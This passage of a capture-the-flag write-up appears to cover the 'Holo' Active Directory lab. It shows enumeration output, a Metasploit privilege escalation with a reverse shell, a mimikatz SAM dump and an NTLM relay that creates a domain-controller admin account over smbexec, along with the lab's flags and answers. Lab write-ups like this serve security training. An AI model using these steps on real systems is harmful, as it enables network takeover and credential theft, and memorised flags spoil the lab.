PC-FILESRV01 Power Users Power Users are included for backwards compati...
PC-FILESRV01 Print Operators Members can administer printers installed on d...
PC-FILESRV01 RDS Endpoint Servers Servers in this group run virtual machines and...
PC-FILESRV01 RDS Management Servers Servers in this group can perform routine admi...
PC-FILESRV01 RDS Remote Access Servers Servers in this group enable users of RemoteAp...
PC-FILESRV01 Remote Desktop Users Members in this group are granted the right to...
PC-FILESRV01 Remote Management Users Members of this group can access WMI resources...
PC-FILESRV01 Replicator Supports file replication in a domain
PC-FILESRV01 Storage Replica Administrators Members of this group have complete and unrest...
PC-FILESRV01 System Managed Accounts Group Members of this group are managed by the system.
PC-FILESRV01 Users Users are prevented from making accidental or ...
Get-NetLocalGroupMember -Group Administrators
PS C:\Windows\System32\spool\drivers\color> Get-NetLocalGroupMember -Group Administrators
ComputerName : PC-FILESRV01
GroupName : Administrators
MemberName : PC-FILESRV01\Administrator
SID : S-1-5-21-4241685735-4112329853-1893400299-500
IsGroup : False
IsDomain : False
ComputerName : PC-FILESRV01
GroupName : Administrators
MemberName : HOLOLIVE\Domain Admins
SID : S-1-5-21-471847105-3603022926-1728018720-512
IsGroup : True
IsDomain : True
Get-NetLoggedon
PS C:\Windows\System32\spool\drivers\color> Get-NetLoggedon
UserName : watamet
LogonDomain : HOLOLIVE
AuthDomains :
LogonServer : DC-SRV01
ComputerName : localhost
UserName : PC-FILESRV01$
LogonDomain : HOLOLIVE
AuthDomains :
LogonServer :
ComputerName : localhost
UserName : PC-FILESRV01$
LogonDomain : HOLOLIVE
AuthDomains :
LogonServer :
ComputerName : localhost
UserName : PC-FILESRV01$
LogonDomain : HOLOLIVE
AuthDomains :
LogonServer :
ComputerName : localhost
UserName : PC-FILESRV01$
LogonDomain : HOLOLIVE
AuthDomains :
LogonServer :
ComputerName : localhost
UserName : PC-FILESRV01$
LogonDomain : HOLOLIVE
AuthDomains :
LogonServer :
ComputerName : localhost
UserName : PC-FILESRV01$
LogonDomain : HOLOLIVE
AuthDomains :
LogonServer :
ComputerName : localhost
Get-DomainGPO
PS C:\Windows\System32\spool\drivers\color> Get-DomainGPO
usncreated : 5672
systemflags : -1946157056
displayname : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB
94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-
00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D
1-A28C-00C04FB94F17}]
whenchanged : 12/31/2021 1:08:39 AM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 2147368
dscorepropagationdata : {10/23/2020 1:33:58 AM, 10/22/2020 11:43:31 PM, 1/1/1601 12:00:00 AM}
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags : 0
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\holo.live\sysvol\holo.live\Policies\{31B2F340-016D-11D2-945F-00C04FB9
84F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=holo
,DC=live
whencreated : 10/22/2020 11:41:59 PM
versionnumber : 71
instancetype : 4
objectguid : 5d03de40-73dd-48d7-8eb7-90a633113913
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=holo,DC=live
usncreated : 5675
systemflags : -1946157056
displayname : Default Domain Controllers Policy
gpcmachineextensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90
F574B}]
whenchanged : 8/31/2021 4:24:11 AM
objectclass : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly : True
usnchanged : 1952694
dscorepropagationdata : {10/23/2020 1:33:58 AM, 10/22/2020 11:43:31 PM, 1/1/1601 12:00:00 AM}
name : {6AC1786C-016F-11D2-945F-00C04fB984F9}
flags : 0
cn : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\holo.live\sysvol\holo.live\Policies\{6AC1786C-016F-11D2-945F-00C04fB9
84F9}
distinguishedname : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=holo
,DC=live
whencreated : 10/22/2020 11:41:59 PM
versionnumber : 22
instancetype : 4
objectguid : 18a7cb1f-a6d4-4014-8e4b-8a6af2662d8a
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=holo,DC=live
Find-LocalAdminAccess
PS C:\Windows\System32\spool\drivers\color> Find-LocalAdminAccess
S-SRV01.holo.live
Task 42 – Situational Awareness – Import-Module PowerUpGreySkull.ps1
This task covers enumeration using nothing but standard PowerShell commands… some of (most of?) these have been covered in other topics, and are all pretty self-explanatory… like the last task, this will simply show the output of each command listed in this task on PC-FILESRV01
NOTE: This room seems further broken due to the fact that you cannot actually find the target scheduled task in the list… which could be the fact that it doesn’t exist (I hope not!) or you need to be SYSTEM to see it… either way, the steps in the task give a big hint to do
Get-ScheduledTask -TaskPath "\Users\"
but that turns up nothing:Because of this, the example command output below that look deeper into the Scheduled Tasks list are aimed at a random system-generated task.
PowerShell Enumeration
Get-ScheduledTask
PS C:\Windows\System32\spool\drivers\color> Get-ScheduledTask
TaskPath TaskName State
-------- -------- -----
\Microsoft\Windows\ Server Initial Configuration Task Disabled
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319 Ready
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319 64 Ready
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319... Disabled
\Microsoft\Windows\.NET Framework\ .NET Framework NGEN v4.0.30319... Disabled
\Microsoft\Windows\Active Directory Rights ... AD RMS Rights Policy Template ... Disabled
\Microsoft\Windows\Active Directory Rights ... AD RMS Rights Policy Template ... Ready
\Microsoft\Windows\AppID\ PolicyConverter Ready
\Microsoft\Windows\AppID\ VerifiedPublisherCertStoreCheck Ready
\Microsoft\Windows\Application Experience\ Microsoft Compatibility Appraiser Ready
\Microsoft\Windows\Application Experience\ ProgramDataUpdater Running
\Microsoft\Windows\Application Experience\ StartupAppTask Ready
\Microsoft\Windows\ApplicationData\ appuriverifierdaily Ready
\Microsoft\Windows\ApplicationData\ appuriverifierinstall Ready
\Microsoft\Windows\ApplicationData\ CleanupTemporaryState Ready
\Microsoft\Windows\ApplicationData\ DsSvcCleanup Ready
\Microsoft\Windows\AppxDeploymentClient\ Pre-staged app cleanup Disabled
\Microsoft\Windows\Autochk\ Proxy Ready
\Microsoft\Windows\BitLocker\ BitLocker Encrypt All Drives Ready
\Microsoft\Windows\BitLocker\ BitLocker MDM policy Refresh Ready
\Microsoft\Windows\Bluetooth\ UninstallDeviceTask Disabled
\Microsoft\Windows\BrokerInfrastructure\ BgTaskRegistrationMaintenanceTask Ready
\Microsoft\Windows\CertificateServicesClient\ UserTask Ready
\Microsoft\Windows\CertificateServicesClient\ UserTask-Roam Ready
\Microsoft\Windows\Chkdsk\ ProactiveScan Ready
\Microsoft\Windows\Chkdsk\ SyspartRepair Ready
\Microsoft\Windows\CloudExperienceHost\ CreateObjectTask Ready
\Microsoft\Windows\Customer Experience Impr... Consolidator Ready
\Microsoft\Windows\Customer Experience Impr... UsbCeip Ready
\Microsoft\Windows\Data Integrity Scan\ Data Integrity Scan Ready
\Microsoft\Windows\Data Integrity Scan\ Data Integrity Scan for Crash ... Ready
\Microsoft\Windows\Defrag\ ScheduledDefrag Ready
\Microsoft\Windows\Device Information\ Device Ready
\Microsoft\Windows\Diagnosis\ Scheduled Ready
\Microsoft\Windows\DirectX\ DXGIAdapterCache Ready
\Microsoft\Windows\DiskCleanup\ SilentCleanup Ready
\Microsoft\Windows\DiskDiagnostic\ Microsoft-Windows-DiskDiagnost... Disabled
\Microsoft\Windows\DiskDiagnostic\ Microsoft-Windows-DiskDiagnost... Disabled
\Microsoft\Windows\DiskFootprint\ Diagnostics Ready
\Microsoft\Windows\DiskFootprint\ StorageSense Ready
\Microsoft\Windows\EDP\ EDP App Launch Task Ready
\Microsoft\Windows\EDP\ EDP Auth Task Ready
\Microsoft\Windows\EDP\ EDP Inaccessible Credentials Task Ready
\Microsoft\Windows\EDP\ StorageCardEncryption Task Ready
\Microsoft\Windows\ExploitGuard\ ExploitGuard MDM policy Refresh Ready
\Microsoft\Windows\File Classification Infr... Property Definition Sync Disabled
\Microsoft\Windows\Flighting\FeatureConfig\ ReconcileFeatures Ready
\Microsoft\Windows\Flighting\OneSettings\ RefreshCache Ready
\Microsoft\Windows\InstallService\ ScanForUpdates Disabled
\Microsoft\Windows\InstallService\ ScanForUpdatesAsUser Disabled
\Microsoft\Windows\InstallService\ WakeUpAndContinueUpdates Disabled
\Microsoft\Windows\InstallService\ WakeUpAndScanForUpdates Disabled
\Microsoft\Windows\LanguageComponentsInstal... Installation Ready
\Microsoft\Windows\Location\ Notifications Ready
\Microsoft\Windows\Location\ WindowsActionDialog Ready
\Microsoft\Windows\Maintenance\ WinSAT Ready
\Microsoft\Windows\Maps\ MapsToastTask Disabled
\Microsoft\Windows\Maps\ MapsUpdateTask Disabled
\Microsoft\Windows\MemoryDiagnostic\ ProcessMemoryDiagnosticEvents Disabled
\Microsoft\Windows\MemoryDiagnostic\ RunFullMemoryDiagnostic Disabled
\Microsoft\Windows\Mobile Broadband Accounts\ MNO Metadata Parser Ready
\Microsoft\Windows\MUI\ LPRemove Ready
\Microsoft\Windows\Multimedia\ SystemSoundsService Disabled
\Microsoft\Windows\NetTrace\ GatherNetworkInfo Ready
\Microsoft\Windows\Offline Files\ Background Synchronization Disabled
\Microsoft\Windows\Offline Files\ Logon Synchronization Disabled
\Microsoft\Windows\PLA\ Server Manager Performance Mon... Disabled
\Microsoft\Windows\Plug and Play\ Device Install Group Policy Ready
\Microsoft\Windows\Plug and Play\ Device Install Reboot Required Ready
\Microsoft\Windows\Plug and Play\ Sysprep Generalize Drivers Ready
\Microsoft\Windows\Power Efficiency Diagnos... AnalyzeSystem Queued
\Microsoft\Windows\RecoveryEnvironment\ VerifyWinRE Disabled
\Microsoft\Windows\Registry\ RegIdleBackup Ready
\Microsoft\Windows\Server Manager\ CleanupOldPerfLogs Ready
\Microsoft\Windows\Server Manager\ ServerManager Ready
\Microsoft\Windows\Servicing\ StartComponentCleanup Ready
\Microsoft\Windows\SharedPC\ Account Cleanup Disabled
\Microsoft\Windows\Shell\ CreateObjectTask Ready
\Microsoft\Windows\Shell\ IndexerAutomaticMaintenance Ready
\Microsoft\Windows\Software Inventory Logging\ Collection Disabled
\Microsoft\Windows\Software Inventory Logging\ Configuration Ready
\Microsoft\Windows\SoftwareProtectionPlatform\ SvcRestartTaskLogon Ready
\Microsoft\Windows\SpacePort\ SpaceAgentTask Ready
\Microsoft\Windows\SpacePort\ SpaceManagerTask Ready
\Microsoft\Windows\Speech\ HeadsetButtonPress Ready
\Microsoft\Windows\Storage Tiers Management\ Storage Tiers Management Initi... Ready
\Microsoft\Windows\Storage Tiers Management\ Storage Tiers Optimization Disabled
\Microsoft\Windows\Task Manager\ Interactive Ready
\Microsoft\Windows\termsrv\RemoteFX\ RemoteFXvGPUDisableTask Ready
\Microsoft\Windows\termsrv\RemoteFX\ RemoteFXWarningTask Ready
\Microsoft\Windows\TextServicesFramework\ MsCtfMonitor Ready
\Microsoft\Windows\Time Synchronization\ ForceSynchronizeTime Ready
\Microsoft\Windows\Time Synchronization\ SynchronizeTime Ready
\Microsoft\Windows\Time Zone\ SynchronizeTimeZone Ready
\Microsoft\Windows\UPnP\ UPnPHostConfig Disabled
\Microsoft\Windows\WDI\ ResolutionHost Ready
\Microsoft\Windows\Windows Defender\ Windows Defender Cache Mainten... Ready
\Microsoft\Windows\Windows Defender\ Windows Defender Cleanup Ready
\Microsoft\Windows\Windows Defender\ Windows Defender Scheduled Scan Ready
\Microsoft\Windows\Windows Defender\ Windows Defender Verification Ready
\Microsoft\Windows\Windows Error Reporting\ QueueReporting Ready
\Microsoft\Windows\Windows Filtering Platform\ BfeOnServiceStartTypeChange Ready
\Microsoft\Windows\Windows Media Sharing\ UpdateLibrary Ready
\Microsoft\Windows\WindowsColorSystem\ Calibration Loader Ready
\Microsoft\Windows\WindowsUpdate\ Scheduled Start Ready
\Microsoft\Windows\Wininet\ CacheTask Running
\Microsoft\Windows\Workplace Join\ Automatic-Device-Join Ready
\Microsoft\Windows\Workplace Join\ Recovery-Check Disabled
Get-ScheduledTask -TaskPath "\Microsoft\Windows\Wininet\"
PS C:\Windows\System32\spool\drivers\color> Get-ScheduledTask -TaskPath "\Microsoft\Windows\Wininet\"
TaskPath TaskName State
-------- -------- -----
\Microsoft\Windows\Wininet\ CacheTask Running
Get-ScheduledTaskInfo -TaskName "\Microsoft\Windows\Wininet\CacheTask"
PS C:\Windows\System32\spool\drivers\color> Get-ScheduledTaskInfo -TaskName "\Microsoft\Windows\Wininet\CacheTask"
LastRunTime : 1/29/2022 2:09:09 AM
LastTaskResult : 267009
NextRunTime :
NumberOfMissedRuns : 0
TaskName : \Microsoft\Windows\Wininet\CacheTask
TaskPath :
PSComputerName :
whoami /priv
PS C:\Windows\System32\spool\drivers\color> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
NOTE: Just to add further salt to the wound, the next 3 commands relating to Active Directory enumeration using the
ActiveDirectory
module do not actually work on this box.
From my research, the only way to enable it is to use an Administrator account running PowerShell… therefore, the below screenshots of the command output is from the task itself.
Import-Module ActiveDirectory; Get-ADGroup
Import-Module ActiveDirectory; Get-ADGroupMember
Import-Module ActiveDirectory; Get-ADPrincipalGroupMembership
Task 43 – Privilege Escalation – WERE TAKING OVER THIS DLL!
From the MITRE ATT&CK framework, DLL Hijacking is defined as "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. [1] Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution." The AT&CK Technique ID is T1574.
To utilize DLL Hijacking for privilege escalation, we will need to research the application and known vulnerabilities and DLLs and find a DLL not present on the system we have write access to.
DLL Hijacking can also be used for persistence, as we will see later in the next task. This process is much easier than the previous one as we can use process monitoring tools like ProcMon and ProcessHacker2 to monitor for DLLs and their locations that can take over. The DLL persistence works by running the DLL with the application every time the system restarts or our connection is interrupted. This can be an application we put onto the system or an application already present that we exploit.
Steps taken to perform DLL hijacking are outlined below.
- Identify vulnerable application and location
- Identify applications PID
- Identify vulnerable DLLs that can be hijacked
- Use MSFVenom or other payload creation tools to create a malicious DLL
- Replace the original DLL with the malicious DLL
- Profit
What is the name of the vulnerable application found on PC-FILESRV01?
Task 44 – Persistence – WERE TAKING OVER THIS DLL! Part: II
I have intentionally skipped showing any steps on task #43 due to the fact that in all honesty it didn’t actually explain what to do to find the DLL without having access to SYSTEM. I then decided to simply copy kavremover.exe
to my own development Win 10 VM and ran ProcMon on it to find the DLL we were supposed to use to gain privilege escalation (see below for reason why this was not worthwhile)… because of said reason, using it for persistence was also irrelevant.
Using ProcMon to find exploitable DLLs
- First, run
ProcMon.exe
– you will be presented with a window like below:
- Minimize ProcMon and then start up
karemover.exe
– it will require Administrator access. Accept the agreement and you will land on a screen like below – you can now close the app by pressing theExit
button… we have captured what we need!
- Now we return to ProcMon. To filter the list, go to Filter -> Filter in the top menu to open the
Process Monitor Filter
window:
- The first filter we will apply is to
Process Name
thatends with
karemover.exe
:
- Then we will set a filter for
Path
thatends with
.dll
:
- Finally, we set a filter for
Result
thatcontains
NAME NOT FOUND
:
- You should now have the following 3 new filters below:
- Press
OK
button to apply the filters and get out of theProcess Monitor Filter
window – you will be presented with a list of hits, we need to find an attempt to "CreateFile" in a location we can write to (for persistence, this can be any DLL that doesn’t already exist since we can write to anything when SYSTEM – hence using something inC:\Windows
would be better to mitigate detection)… below shows the DLL we are going to target:
NOTE: As suspected – the scheduled task for the app we are supposed to DLL hijack does not exist (hence why I couldn’t find it during the scheduled task check done in task #… so after hours of failures on all sorts of other attempts I finally loaded up a meterpreter session on
PC-FILESRV01
aswatamet
and ranmulti/recon/local_exploit_suggester
on the unprivileged session…
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.200.110.35 - Collecting local exploits for x64/windows...
[*] 10.200.110.35 - 31 exploit checks are being tried...
[+] 10.200.110.35 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.200.110.35 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.200.110.35 - exploit/windows/local/cve_2020_17136: The target appears to be vulnerable. A vulnerable Windows 10 v1809 build was detected!
[+] 10.200.110.35 - exploit/windows/local/cve_2021_40449: The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[*] Post module execution completed
PRIVESC >> pwning PC-FILESRV01 using CVE-2021-40449 local privesc
msf6 exploit(windows/local/cve_2021_40449) > run
[*] Started reverse TCP handler on 10.50.107.119:6969
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target's build number: 10.0.17763.1577
[+] The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[*] Launching netsh to host the DLL...
[+] Process 4924 launched.
[*] Reflectively injecting the DLL into 4924...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200262 bytes) to 10.200.110.35
[*] Meterpreter session 3 opened (10.50.107.119:6969 -> 10.200.110.35:50000 ) at 2022-01-30 19:14:14 +1100
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
LOOT >> PC-FILESRV01 root.txt!
C:\Users\Administrator\Desktop>type root.txt
type root.txt
<REDACTED>
FLAG - PC-FILESRV01 root.txt
LOOT >> lsadump::sam on PC-FILESRV01 – Administrator NTLM hash for Evil-WinRM!
mimikatz(powershell) # lsadump::sam
Domain : PC-FILESRV01
SysKey : 51412f14c5f14da393f8fa29e1670300
Local SID : S-1-5-21-4241685735-4112329853-1893400299
SAMKey : 65d982c48195c316cdb93707443dd4c1
RID : 000001f4 (500)
User : Administrator
Hash NTLM: <REDACTED>
...
CREDS - Administrator NTLM hash
What is the first listed vulnerable DLL located in the Windows folder from the application
Task 45-47 – NTLM Relay – …
I am combining the 3 tasks due to the fact that most of it is not really necessary to repeat here, if theory is needed then go read the details in these tasks…
Below is the steps required to perform the SMB relay attack – this is using ntlmrelayx.py
from Impacket to listen for SMB connections to grab the users NetNTLMv2 hash and relay the session, a meterpreter port forward to push all SMB data back to us, and we use secretsdump.py
from Impacket to dump all those juicy credz!
To successfully pull this off we need a server with SMB Signing
disabled… DC-SRV01
happens to be just that. 😉
PRIVESC >> SMB relay attack!
- Disabling SMB on
PC-FILESRV01
meterpreter > shell
Process 4624 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1577]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>sc stop netlogon
sc stop netlogon
SERVICE_NAME: netlogon
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0xea60
C:\Windows\system32>sc stop lanmanserver
sc stop lanmanserver
SERVICE_NAME: lanmanserver
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x4e20
C:\Windows\system32>sc config lanmanserver start= disabled
sc config lanmanserver start= disabled
[SC] ChangeServiceConfig SUCCESS
C:\Windows\system32>sc stop lanmanworkstation
sc stop lanmanworkstation
[SC] ControlService FAILED 1051:
A stop control has been sent to a service that other running services are dependent on.
C:\Windows\system32>sc config lanmanworkstation start= disabled
sc config lanmanworkstation start= disabled
[SC] ChangeServiceConfig SUCCESS
C:\Windows\system32>shutdown /r
shutdown /r
C:\Windows\system32>[*] 10.200.110.35 - Meterpreter session 6 closed. Reason: Died
- Starting NTLMRelayX on attack box
❯ sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -t smb://10.200.110.30 -smb2support -socks
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening at port 1080
[*] SMB Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Setting up WCF Server
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> * Serving Flask app "impacket.examples.ntlmrelayx.servers.socksserver" (lazy loading)
* Environment: production
WARNING: This is a development server. Do not use it in a production deployment.
Use a production WSGI server instead.
* Debug mode: off
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] SMBD-Thread-8: Connection from HOLOLIVE/SRV-ADMIN@10.50.107.119 controlled, attacking target smb://10.200.110.30
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] Authenticating against smb://10.200.110.30 as HOLOLIVE/SRV-ADMIN SUCCEED
[*] SOCKS: Adding HOLOLIVE/SRV-ADMIN@10.200.110.30(445) to active SOCKS connection. Enjoy
- Setting up port forward via meterpreter on SYSTEM account @
PC-FILESRV01
meterpreter > portfwd add -R -L 10.50.107.119 -l 445 -p 445
[*] Local TCP relay created: 10.50.107.119:445 <-> :445
PRIVESC >> adding account with Admin to DC-SRV01 via ntlmrelayed proxy and smbexec
sudo proxychains python3 /opt/impacket/examples/smbexec.py -no-pass HOLOLIVE/SRV-ADMIN@10.200.110.30
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.25.dev1+20220128.170256.e007046d - Copyright 2021 SecureAuth Corporation
|S-chain|-<>-127.0.0.1:1080-<><>-10.200.110.30:445-<><>-OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>net user stimpz0r r00t3d! /add
The command completed successfully.
C:\Windows\system32>net localgroup Administrators /add stimpz0r
The command completed successfully.
CREDS - secretsdump from DC-SRV01 - domain PWNED!
LOOT >> DC-SRV01 root.txt!
❯ evil-winrm -i 10.200.110.30 -u stimpz0r -p 'r00t3d!'
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\stimpz0r\Documents> cd ..\..\Administrator
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
<REDACTED>
FLAG - DC-SRV01 root.txt
Cleaning up for the other users! 😉
meterpreter > shell
Process 3432 created.
Channel 224 created.
Microsoft Windows [Version 10.0.17763.1577]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>sc config lanmanworkstation start= auto
sc config lanmanworkstation start= auto
[SC] ChangeServiceConfig SUCCESS
C:\Windows\system32>sc config lanmanserver start= auto
sc config lanmanserver start= auto
[SC] ChangeServiceConfig SUCCESS
C:\Windows\system32>sc start lanmanworkstation
sc start lanmanworkstation
SERVICE_NAME: lanmanworkstation
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 544
FLAGS :
C:\Windows\system32>sc start lanmanserver
sc start lanmanserver
SERVICE_NAME: lanmanserver
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2564
FLAGS :
C:\Windows\system32>sc start netlogon
sc start netlogon
SERVICE_NAME: netlogon
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 740
FLAGS : RUNS_IN_SYSTEM_PROCESS
Empire loaded with SYSTEM/root agents from all pwned boxes on Holo!
(yes the bottom one is L-SRV01 – for some reason python agents do not report their IP)
What flag can be found after rooting L-SRV01?
The flag is – HOLO{3792d7d80c4dcabb8a533afddf06f666}
You can click on the questions to reveal the answers, hover over the links first and they should pulse / glow (they will also start with the characters ‘[+]’ if they can be expanded).
What flag can be found after rooting L-SRV01?
HOLO{e16581b01d445a05adb2e6d45eb373f7}